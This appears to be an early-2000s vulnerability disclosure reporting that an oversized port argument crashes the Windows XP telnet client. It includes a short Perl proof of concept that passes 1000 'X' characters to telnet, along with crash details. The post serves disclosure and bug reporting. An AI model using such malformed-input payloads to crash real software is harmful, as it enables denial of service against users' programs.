Microsoft Windows XP

Telnet BUG

I think that this bug only crashes the telnet client of the current user and

nothing more. Telnet.exe will send a crash report if you change the port number to a large number of garbage, like this eg:

#!c:/perl/bin/perl

# Microsoft Windows XP - Telnet BUG

# by David Ferreira

#

$bug = "X" x 1000;

system ("telnet localhost $bug");

---- here ----

I only tried this in this machine:

Kernel version: Microsoft Windows XP, Uniprocessor Free

Product type: Professional

Product version: 5.1

Service pack: 0

Kernel build number: 2600

Processors: 1

Processor speed: 850 MHz

Processor type: x86 Family 6 Model 3 Stepping 1, AuthenticAMD

Physical memory: 128 MB

AppName: telnet.exe

AppVer: 5.1.2600.0

Offset: 00580058

Well this telnet.exe it's diferent from the others in early versions like the one that come with Windows 98 and Me, because I tried the same bug and it didn't work due to the size of the "trash" is limited. That's what this telnet.exe needs. Something to limit the variables.

Well, I hope that help...

Thanks for your time...
